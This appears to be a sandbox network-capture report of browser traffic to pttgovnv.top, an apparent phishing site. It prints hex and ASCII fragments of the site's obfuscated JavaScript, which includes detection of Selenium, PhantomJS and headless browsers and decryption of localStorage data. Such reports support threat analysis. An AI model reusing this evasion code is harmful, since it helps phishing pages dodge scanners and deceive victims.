          Sec-Fetch-Dest: style
          Referer: https://pttgovnv.top/help/
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:16 UTC737INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:16 GMT
          Content-Type: text/css; charset=utf-8
          Content-Length: 323
          Connection: close
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"143-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 37057
          Accept-Ranges: bytes
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Blit0Lmhj8jOw8o9%2BNkKk%2F2mWqWfC%2F0zLt9WVHLFRq1NXjalKMpL6cc8sQbPZb2zLE5qz5rLbYxeeYLXodnUZsb5ikSrX6tv63M%2F1u4h6DdjSI7tlfS6lqPcLncTW0E%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acddaad642b2-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:16 UTC323INData Raw: 68 31 2e 74 69 74 6c 65 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 63 6f 6c 6f 72 3a 23 32 34 35 34 39 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 72 65 6d 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 64 69 76 2e 63 6f 6e 74 65 6e 74 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 70 61 64 64 69 6e 67 3a 31 30 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 32 66 32 66 32 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 33 70 78 7d 75 6c 5b 64 61 74 61 2d 76 2d 66 65 35 61 65 37 33 31 5d 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 64 69 73 63 20 6f 75 74 73 69 64 65 20 6e 6f 6e 65 21 69 6d 70 6f 72 74 61 6e 74 3b 6c 69 73 74 2d 73 74 79 6c 65 3a 69 6e 69 74 69 61 6c 21 69 6d 70 6f 72 74 61 6e 74 7d 75 6c 5b 64 61 74 61 2d 76
          Data Ascii: h1.title[data-v-fe5ae731]{color:#24549d;font-size:2rem;text-align:center}div.content[data-v-fe5ae731]{padding:10px;background-color:#f2f2f2;border-radius:3px}ul[data-v-fe5ae731]{list-style:disc outside none!important;list-style:initial!important}ul[data-v


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          10192.168.2.449746172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:16 UTC532OUTGET /help/assets/c16a2af0JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:16 UTC764INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:16 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"8a73-18fc3d84e20"
          CF-Cache-Status: HIT
          Age: 37058
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0OVxADxpoQFmdhECQd5vv4cz3dNlj4e9xBqK8xPGr11tEqhX0%2FClO%2BXcg7oU5vHGMRj6%2FwMRIJsO%2BfLKNgTUfRK7t1wpimmTjzpHROE2er1aprB%2BX89c8cR8atmP%2BVQ%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acddbd098c3c-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:16 UTC605INData Raw: 37 63 62 34 0d 0a 76 61 72 20 61 32 33 5f 30 78 32 32 30 38 61 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 31 37 31 61 32 32 2c 5f 30 78 32 39 64 61 64 62 29 7b 76 61 72 20 5f 30 78 31 33 65 38 38 35 3d 61 32 33 5f 30 78 31 62 39 34 2c 5f 30 78 31 33 62 65 61 38 3d 5f 30 78 31 37 31 61 32 32 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 76 61 72 20 5f 30 78 34 63 63 35 36 38 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 32 63 35 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 65 38 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38 38 35 28 30 78 31 66 62 29 29 2f 30 78 33 2a 28 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 31 33 65 38
          Data Ascii: 7cb4var a23_0x2208a5=a23_0x1b94;(function(_0x171a22,_0x29dadb){var _0x13e885=a23_0x1b94,_0x13bea8=_0x171a22();while(!![]){try{var _0x4cc568=parseInt(_0x13e885(0x2c5))/0x1*(parseInt(_0x13e885(0x1e8))/0x2)+parseInt(_0x13e885(0x1fb))/0x3*(-parseInt(_0x13e8
          2024-09-01 22:25:16 UTC1369INData Raw: 68 27 5d 28 5f 30 78 31 33 62 65 61 38 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 61 32 33 5f 30 78 31 61 35 38 2c 30 78 38 39 63 36 38 29 29 3b 69 6d 70 6f 72 74 7b 6c 20 61 73 20 61 32 33 5f 30 78 34 39 32 65 30 35 2c 5f 20 61 73 20 61 32 33 5f 30 78 31 38 35 62 65 65 7d 66 72 6f 6d 27 2e 2f 69 6e 64 65 78 2d 66 35 34 35 37 37 31 38 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 72 20 61 73 20 61 32 33 5f 30 78 35 65 37 34 62 31 7d 66 72 6f 6d 27 2e 2f 30 39 62 66 30 31 66 38 4a 78 4b 6e 57 2e 6a 73 27 3b 69 6d 70 6f 72 74 7b 6d 20 61 73 20 61 32 33 5f 30 78 35 65 38 39 62 39 7d 66 72 6f 6d 27 2e 2f 65 63 32 31 35 31 37 62 4a 78 4b 6e 57 2e 6a 73 27 3b 76 61 72 20 45 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 62 65 39 39 38 2c 5f 30 78 32 66 36 37 65 62 29
          Data Ascii: h'](_0x13bea8['shift']());}}}(a23_0x1a58,0x89c68));import{l as a23_0x492e05,_ as a23_0x185bee}from'./index-f5457718.js';import{r as a23_0x5e74b1}from'./09bf01f8JxKnW.js';import{m as a23_0x5e89b9}from'./ec21517bJxKnW.js';var E=function(_0x3be998,_0x2f67eb)
          2024-09-01 22:25:16 UTC1369INData Raw: 7b 5f 30 78 37 39 61 33 66 28 5f 30 78 35 39 64 38 36 65 29 3b 7d 29 3b 7d 72 65 74 75 72 6e 20 6e 65 77 28 5f 30 78 34 31 32 63 34 30 7c 7c 28 5f 30 78 34 31 32 63 34 30 3d 50 72 6f 6d 69 73 65 29 29 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 38 35 63 64 36 2c 5f 30 78 31 31 62 35 39 61 29 7b 76 61 72 20 5f 30 78 31 63 61 62 62 34 3d 61 32 33 5f 30 78 31 62 39 34 3b 66 75 6e 63 74 69 6f 6e 20 5f 30 78 33 65 31 63 61 62 28 5f 30 78 36 64 38 66 64 38 29 7b 76 61 72 20 5f 30 78 31 39 38 61 66 35 3d 61 32 33 5f 30 78 31 62 39 34 3b 74 72 79 7b 5f 30 78 34 33 65 62 34 38 28 5f 30 78 33 38 38 30 65 37 5b 5f 30 78 31 39 38 61 66 35 28 30 78 32 64 64 29 5d 28 5f 30 78 36 64 38 66 64 38 29 29 3b 7d 63 61 74 63 68 28 5f 30 78 31 39 64 39 64 33 29 7b 5f 30 78 31 31
          Data Ascii: {_0x79a3f(_0x59d86e);});}return new(_0x412c40||(_0x412c40=Promise))(function(_0x385cd6,_0x11b59a){var _0x1cabb4=a23_0x1b94;function _0x3e1cab(_0x6d8fd8){var _0x198af5=a23_0x1b94;try{_0x43eb48(_0x3880e7[_0x198af5(0x2dd)](_0x6d8fd8));}catch(_0x19d9d3){_0x11
          2024-09-01 22:25:16 UTC1369INData Raw: 34 34 62 32 36 64 26 26 28 5f 30 78 34 34 62 32 36 64 3d 30 78 30 2c 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 26 28 5f 30 78 32 61 64 36 33 37 3d 30 78 30 29 29 2c 5f 30 78 32 61 64 36 33 37 3b 29 74 72 79 7b 69 66 28 5f 30 78 34 33 37 37 33 61 3d 30 78 31 2c 5f 30 78 32 64 39 37 66 64 26 26 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 26 30 78 32 3f 5f 30 78 32 64 39 37 66 64 5b 27 72 65 74 75 72 6e 27 5d 3a 5f 30 78 31 35 38 36 38 64 5b 30 78 30 5d 3f 5f 30 78 32 64 39 37 66 64 5b 27 74 68 72 6f 77 27 5d 7c 7c 28 28 5f 30 78 35 35 35 34 65 31 3d 5f 30 78 32 64 39 37 66 64 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 65 31 29 5d 29 26 26 5f 30 78 35 35 35 34 65 31 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f
          Data Ascii: 44b26d&&(_0x44b26d=0x0,_0x15868d[0x0]&&(_0x2ad637=0x0)),_0x2ad637;)try{if(_0x43773a=0x1,_0x2d97fd&&(_0x5554e1=_0x15868d[0x0]&0x2?_0x2d97fd['return']:_0x15868d[0x0]?_0x2d97fd['throw']||((_0x5554e1=_0x2d97fd[_0x396e75(0x2e1)])&&_0x5554e1[_0x396e75(0x278)](_
          2024-09-01 22:25:16 UTC1369INData Raw: 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 30 34 29 5d 3d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 2c 5f 30 78 32 61 64 36 33 37 5b 27 6f 70 73 27 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 61 32 29 5d 28 5f 30 78 31 35 38 36 38 64 29 3b 62 72 65 61 6b 3b 7d 5f 30 78 35 35 35 34 65 31 5b 30 78 32 5d 26 26 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 65 63 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 2c 5f 30 78 32 61 64 36 33 37 5b 5f 30 78 33 39 36 65 37 35 28 30 78 31 66 33 29 5d 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 35 34 29 5d 28 29 3b 63 6f 6e 74 69 6e 75 65 3b 7d 5f 30 78 31 35 38 36 38 64 3d 5f 30 78 32 62 31 31 63 30 5b 5f 30 78 33 39 36 65 37 35 28 30 78 32 37 38 29 5d 28 5f 30 78 33 64 39
          Data Ascii: 37[_0x396e75(0x204)]=_0x5554e1[0x2],_0x2ad637['ops'][_0x396e75(0x2a2)](_0x15868d);break;}_0x5554e1[0x2]&&_0x2ad637[_0x396e75(0x1ec)][_0x396e75(0x254)](),_0x2ad637[_0x396e75(0x1f3)][_0x396e75(0x254)]();continue;}_0x15868d=_0x2b11c0[_0x396e75(0x278)](_0x3d9
          2024-09-01 22:25:16 UTC1369INData Raw: 33 5f 30 78 32 32 30 38 61 35 28 30 78 31 62 61 29 2c 27 53 65 71 75 65 6e 74 75 6d 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 32 35 29 2c 27 53 6c 69 6d 65 72 4a 53 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 31 64 37 29 2c 27 57 65 62 44 72 69 76 65 72 49 4f 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 33 30 37 29 2b 27 6f 27 2c 27 57 65 62 44 72 69 76 65 72 27 3a 27 77 65 62 64 72 69 76 65 72 27 2c 27 48 65 61 64 6c 65 73 73 43 68 72 6f 6d 65 27 3a 27 68 65 61 64 6c 65 73 73 5f 63 27 2b 27 68 72 6f 6d 65 27 2c 27 55 6e 6b 6e 6f 77 6e 27 3a 61 32 33 5f 30 78 32 32 30 38 61 35 28 30 78 32 39 36 29 7d 2c 63 3d 66 75 6e 63 74 69 6f 6e 28 5f 30 78 34 34 63 34 37 65 29 7b 76 61 72 20 5f 30 78 35 35 63 30 35 39 3d 28 66 75 6e 63 74 69
          Data Ascii: 3_0x2208a5(0x1ba),'Sequentum':a23_0x2208a5(0x225),'SlimerJS':a23_0x2208a5(0x1d7),'WebDriverIO':a23_0x2208a5(0x307)+'o','WebDriver':'webdriver','HeadlessChrome':'headless_c'+'hrome','Unknown':a23_0x2208a5(0x296)},c=function(_0x44c47e){var _0x55c059=(functi
          2024-09-01 22:25:16 UTC1369INData Raw: 5d 28 5f 30 78 61 63 64 39 36 37 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 37 63 29 5d 3b 69 66 28 2f 73 6c 69 6d 65 72 6a 73 2f 69 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 30 39 29 5d 28 5f 30 78 61 63 64 39 36 37 5b 5f 30 78 33 34 63 37 39 32 28 30 78 32 31 39 29 5d 29 29 72 65 74 75 72 6e 20 75 5b 5f 30 78 33 34 63 37 39 32 28 30 78 33 30 30 29 5d 3b 7d 66 75 6e 63 74 69 6f 6e 20 70 28 5f 30 78 66 32 62 35 65 38 2c 5f 30 78 34 62 63 61 31 61 29 7b 76 61 72 20 5f 30 78 34 37 61 31 61 61 3d 61 32 33 5f 30 78 32 32 30 38 61 35 3b 72 65 74 75 72 6e 20 5f 30 78 66 32 62 35 65 38 5b 5f 30 78 34 37 61 31 61 61 28 30 78 32 62 36 29 5d 28 5f 30 78 34 62 63 61 31 61 29 21 3d 3d
          Data Ascii: ](_0xacd967[_0x34c792(0x219)]))return u[_0x34c792(0x27c)];if(/slimerjs/i[_0x34c792(0x209)](_0xacd967[_0x34c792(0x219)]))return u[_0x34c792(0x300)];}function p(_0xf2b5e8,_0x4bca1a){var _0x47a1aa=a23_0x2208a5;return _0xf2b5e8[_0x47a1aa(0x2b6)](_0x4bca1a)!==
          2024-09-01 22:25:16 UTC1369INData Raw: 5b 5f 30 78 37 36 38 33 32 30 5d 2c 5f 30 78 33 37 66 33 32 36 3d 5f 30 78 36 30 33 32 61 61 28 5f 30 78 34 34 32 37 33 61 29 3b 69 66 28 74 79 70 65 6f 66 20 5f 30 78 33 37 66 33 32 36 3d 3d 27 6f 62 6a 65 63 74 27 29 72 65 74 75 72 6e 20 5f 30 78 33 37 66 33 32 36 5b 5f 30 78 32 33 32 38 38 36 28 30 78 32 31 39 29 5d 3b 7d 72 65 74 75 72 6e 21 30 78 31 3b 7d 66 75 6e 63 74 69 6f 6e 20 67 28 5f 30 78 31 64 66 31 37 64 29 7b 72 65 74 75 72 6e 20 5f 30 78 31 64 66 31 37 64 5b 27 72 65 64 75 63 65 27 5d 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 32 33 33 32 66 37 2c 5f 30 78 34 36 37 66 66 36 29 7b 72 65 74 75 72 6e 20 5f 30 78 32 33 33 32 66 37 2b 28 5f 30 78 34 36 37 66 66 36 3f 30 78 31 3a 30 78 30 29 3b 7d 2c 30 78 30 29 3b 7d 66 75 6e 63 74 69 6f 6e 20 61
          Data Ascii: [_0x768320],_0x37f326=_0x6032aa(_0x44273a);if(typeof _0x37f326=='object')return _0x37f326[_0x232886(0x219)];}return!0x1;}function g(_0x1df17d){return _0x1df17d['reduce'](function(_0x2332f7,_0x467ff6){return _0x2332f7+(_0x467ff6?0x1:0x0);},0x0);}function a
          2024-09-01 22:25:16 UTC1369INData Raw: 2e 2f 30 39 62 66 30 31 66 38 27 2c 27 65 78 74 65 72 6e 61 6c 27 2c 27 63 61 6c 6c 50 68 61 6e 74 6f 27 2c 27 74 6f 4c 6f 77 65 72 43 61 73 27 2c 27 38 64 4f 79 6f 4a 43 27 2c 27 74 65 4e 61 6d 65 73 27 2c 27 34 71 54 73 59 61 77 27 2c 27 65 6c 65 63 74 72 6f 6e 27 2c 27 63 6f 6c 6c 65 63 74 27 2c 27 72 65 65 6e 58 27 2c 27 65 72 72 6f 72 54 72 61 63 65 27 2c 27 57 65 62 4b 69 74 4d 65 64 69 27 2c 27 4d 65 64 69 61 53 65 74 74 69 27 2c 27 53 65 6c 65 6e 69 75 6d 27 2c 27 6e 67 73 52 61 6e 67 65 27 2c 27 77 65 62 47 4c 27 2c 27 38 30 31 30 38 33 37 72 58 65 58 76 4b 27 2c 27 6d 73 69 65 27 2c 27 6c 76 65 4c 6f 63 61 6c 46 69 27 2c 27 6e 66 6f 27 2c 27 72 5f 65 76 61 6c 75 61 74 65 27 2c 27 67 69 6e 41 72 72 61 79 5c 78 32 30 69 27 2c 27 4a 78 4b 6e 57 2e
          Data Ascii: ./09bf01f8','external','callPhanto','toLowerCas','8dOyoJC','teNames','4qTsYaw','electron','collect','reenX','errorTrace','WebKitMedi','MediaSetti','Selenium','ngsRange','webGL','8010837rXeXvK','msie','lveLocalFi','nfo','r_evaluate','ginArray\x20i','JxKnW.
          2024-09-01 22:25:16 UTC1369INData Raw: 53 63 27 2c 27 73 70 61 77 6e 27 2c 27 5f 73 65 6c 65 6e 69 75 6d 27 2c 27 76 65 72 73 69 6f 6e 73 27 2c 27 6f 6e 73 69 73 74 65 6e 74 27 2c 27 63 6f 64 65 27 2c 27 77 69 6e 64 6f 77 45 78 74 65 27 2c 27 68 61 73 4f 77 6e 50 72 6f 70 27 2c 27 6e 65 78 74 27 2c 27 67 65 74 49 74 65 6d 27 2c 27 4e 69 67 68 74 6d 61 72 65 4a 27 2c 27 65 74 73 27 2c 27 72 65 74 75 72 6e 27 2c 27 65 6d 65 6e 74 4b 65 79 73 27 2c 27 72 41 6c 65 72 74 27 2c 27 72 69 6e 67 43 6f 6e 74 65 78 27 2c 27 66 6c 65 63 74 5d 27 2c 27 68 74 74 70 27 2c 27 53 65 71 75 65 6e 74 75 6d 27 2c 27 63 72 65 61 74 65 27 2c 27 5f 75 6e 77 72 61 70 70 65 64 27 2c 27 36 36 34 34 30 67 66 54 55 46 64 27 2c 27 62 6f 74 27 2c 27 41 70 70 6c 65 50 61 79 45 72 27 2c 27 77 65 62 44 72 69 76 65 72 27 2c 27
          Data Ascii: Sc','spawn','_selenium','versions','onsistent','code','windowExte','hasOwnProp','next','getItem','NightmareJ','ets','return','ementKeys','rAlert','ringContex','flect]','http','Sequentum','create','_unwrapped','66440gfTUFd','bot','ApplePayEr','webDriver','


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          11192.168.2.449749172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:16 UTC532OUTGET /help/assets/ec21517bJxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:16 UTC761INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:16 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:44 GMT
          ETag: W/"a97-18fc3d84e20"
          CF-Cache-Status: HIT
          Age: 37057
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Cgqp5e2HlzwzYyafxeV%2FkqiJWuR%2BG9x5CdoIa4wCIOjGRQzJsoaN8V%2BtF3quaQQmZlZpB%2BaTEUsSr4H1K15FAtBN8TL4ESFYMhkK2Da36Tr53rcREw7LkbM9C%2BnZqM%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acddbfd04283-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:16 UTC608INData Raw: 61 39 37 0d 0a 28 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 64 38 37 64 62 2c 5f 30 78 34 62 35 65 34 37 29 7b 63 6f 6e 73 74 20 5f 30 78 66 65 62 32 31 65 3d 61 33 31 5f 30 78 33 35 35 65 2c 5f 30 78 34 31 64 34 65 34 3d 5f 30 78 33 64 38 37 64 62 28 29 3b 77 68 69 6c 65 28 21 21 5b 5d 29 7b 74 72 79 7b 63 6f 6e 73 74 20 5f 30 78 66 34 63 35 34 33 3d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 36 29 29 2f 30 78 31 2a 28 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 64 29 29 2f 30 78 32 29 2b 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 62 29 29 2f 30 78 33 2b 2d 70 61 72 73 65 49 6e 74 28 5f 30 78 66 65 62 32 31 65 28 30 78 31 32 63 29 29 2f 30 78 34 2b 2d 70 61 72 73 65 49 6e 74 28 5f
          Data Ascii: a97(function(_0x3d87db,_0x4b5e47){const _0xfeb21e=a31_0x355e,_0x41d4e4=_0x3d87db();while(!![]){try{const _0xf4c543=parseInt(_0xfeb21e(0x126))/0x1*(parseInt(_0xfeb21e(0x12d))/0x2)+parseInt(_0xfeb21e(0x12b))/0x3+-parseInt(_0xfeb21e(0x12c))/0x4+-parseInt(_
          2024-09-01 22:25:16 UTC1369INData Raw: 28 61 33 31 5f 30 78 33 36 64 65 2c 30 78 62 66 39 37 31 29 29 3b 63 6f 6e 73 74 20 61 33 31 5f 30 78 32 38 65 37 66 62 3d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 65 74 20 5f 30 78 63 38 32 31 34 35 3d 21 21 5b 5d 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 5f 30 78 33 65 62 37 37 38 2c 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 35 63 33 62 38 39 3d 5f 30 78 63 38 32 31 34 35 3f 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 5f 30 78 33 61 63 32 64 35 3d 61 33 31 5f 30 78 33 35 35 65 3b 69 66 28 5f 30 78 32 30 64 65 63 33 29 7b 63 6f 6e 73 74 20 5f 30 78 32 35 62 33 30 34 3d 5f 30 78 32 30 64 65 63 33 5b 5f 30 78 33 61 63 32 64 35 28 30 78 31 32 61 29 5d 28 5f 30 78 33 65 62 37 37 38 2c 61 72 67 75 6d 65 6e 74 73 29 3b 72 65 74
          Data Ascii: (a31_0x36de,0xbf971));const a31_0x28e7fb=(function(){let _0xc82145=!![];return function(_0x3eb778,_0x20dec3){const _0x5c3b89=_0xc82145?function(){const _0x3ac2d5=a31_0x355e;if(_0x20dec3){const _0x25b304=_0x20dec3[_0x3ac2d5(0x12a)](_0x3eb778,arguments);ret
          2024-09-01 22:25:16 UTC741INData Raw: 6e 67 27 5d 28 29 2c 5f 30 78 35 32 31 31 65 32 3d 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 39 29 5d 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 30 29 5d 28 6c 6f 63 61 6c 53 74 6f 72 61 67 65 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 37 29 5d 28 5f 30 78 31 64 62 64 31 34 29 7c 7c 27 27 2c 5f 30 78 61 34 65 37 35 65 29 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 32 38 29 5d 28 61 33 31 5f 30 78 33 34 66 35 31 33 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 34 29 5d 5b 27 55 74 66 38 27 5d 29 2c 5f 30 78 35 35 65 61 32 65 3d 4a 53 4f 4e 5b 5f 30 78 34 39 64 39 35 63 28 30 78 31 33 66 29 5d 28 5f 30 78 35 32 31 31 65 32 7c 7c 27 7b 7d 27 29 3b 69 66 28 5f 30 78 34 65 62 61 33 33 29 7b 5f 30 78 35 35 65 61 32 65 5b
          Data Ascii: ng'](),_0x5211e2=a31_0x34f513[_0x49d95c(0x129)][_0x49d95c(0x130)](localStorage[_0x49d95c(0x127)](_0x1dbd14)||'',_0xa4e75e)[_0x49d95c(0x128)](a31_0x34f513[_0x49d95c(0x134)]['Utf8']),_0x55ea2e=JSON[_0x49d95c(0x13f)](_0x5211e2||'{}');if(_0x4eba33){_0x55ea2e[
          2024-09-01 22:25:16 UTC5INData Raw: 30 0d 0a 0d 0a
          Data Ascii: 0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          12192.168.2.449751172.67.174.217443280C:\Program Files\Google\Chrome\Application\chrome.exe
          TimestampBytes transferredDirectionData
          2024-09-01 22:25:16 UTC532OUTGET /help/assets/09bf01f8JxKnW.js HTTP/1.1
          Host: pttgovnv.top
          Connection: keep-alive
          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
          Origin: https://pttgovnv.top
          sec-ch-ua-mobile: ?0
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
          sec-ch-ua-platform: "Windows"
          Accept: */*
          Sec-Fetch-Site: same-origin
          Sec-Fetch-Mode: cors
          Sec-Fetch-Dest: script
          Accept-Encoding: gzip, deflate, br
          Accept-Language: en-US,en;q=0.9
          2024-09-01 22:25:16 UTC761INHTTP/1.1 200 OK
          Date: Sun, 01 Sep 2024 22:25:16 GMT
          Content-Type: application/javascript; charset=utf-8
          Transfer-Encoding: chunked
          Connection: close
          Vary: Accept-Encoding
          Access-Control-Allow-Origin: *
          Cache-Control: public, max-age=86400
          Last-Modified: Wed, 29 May 2024 10:14:42 GMT
          ETag: W/"7ad-18fc3d84650"
          CF-Cache-Status: HIT
          Age: 43181
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Fmf3%2FpZqnGUo2vz5q4T1gPyGlOuUbP3lJazPFuYW9f6uTkg5PKEARhN4u%2BqR69%2FTpeIM7h%2FAaexRAysE8jrrwfRiTCoXnuI2ZVtOtvZ00bSQp27IUX%2BfZeGZJiohWf4%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 8bc8acddbafa4384-EWR
          alt-svc: h3=":443"; ma=86400
          2024-09-01 22:25:16 UTC608INData Raw: 37 61 64 0d 0a 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 31 37 32 36 28 29 7b 63 6f 6e 73 74 20 5f 30 78 35 39 30 66 62 36 3d 5b 27 74 6f 53 74 72 69 6e 67 27 2c 27 61 70 70 6c 79 27 2c 27 31 32 31 37 32 38 30 6d 46 59 53 68 67 27 2c 27 37 34 35 31 30 31 48 74 47 52 79 7a 27 2c 27 35 6b 47 7a 6a 5a 66 27 2c 27 28 28 28 2e 2b 29 2b 29 2b 29 27 2c 27 73 65 61 72 63 68 27 2c 27 32 31 34 34 31 33 33 57 78 78 57 57 65 27 2c 27 72 65 6d 6f 76 65 27 2c 27 31 33 36 38 38 31 32 57 71 49 75 52 76 27 2c 27 6e 6f 6f 70 65 6e 65 72 27 2c 27 63 6c 69 63 6b 27 2c 27 32 32 32 36 35 37 34 56 6a 6b 4e 68 68 27 2c 27 34 34 39 33 36 38 6a 7a 6a 62 71 74 27 2c 27 34 32 35 36 39 37 36 4d 69 68 75 43 76 27 2c 27 61 70 70 65 6e 64 27 2c 27 62 6f 64 79 27 2c 27 72 65 6c 27 2c 27
          Data Ascii: 7adfunction a0_0x1726(){const _0x590fb6=['toString','apply','1217280mFYShg','745101HtGRyz','5kGzjZf','(((.+)+)+)','search','2144133WxxWWe','remove','1368812WqIuRv','noopener','click','2226574VjkNhh','449368jzjbqt','4256976MihuCv','append','body','rel','
